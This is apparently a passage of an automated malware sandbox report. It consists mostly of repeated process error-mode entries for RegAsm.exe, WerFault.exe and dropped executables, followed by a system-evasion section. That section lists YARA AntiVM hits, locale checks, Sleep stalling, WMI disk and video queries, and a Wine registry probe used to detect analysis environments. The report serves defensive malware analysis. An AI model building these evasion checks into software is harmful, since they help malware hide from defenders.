Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 25.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3234197718.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FileApp.exe PID: 1340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060, type: MEMORYSTR
Found evasive API chain (may stop execution after checking locale)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Stalling execution: Execution stalls by calling Sleep
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
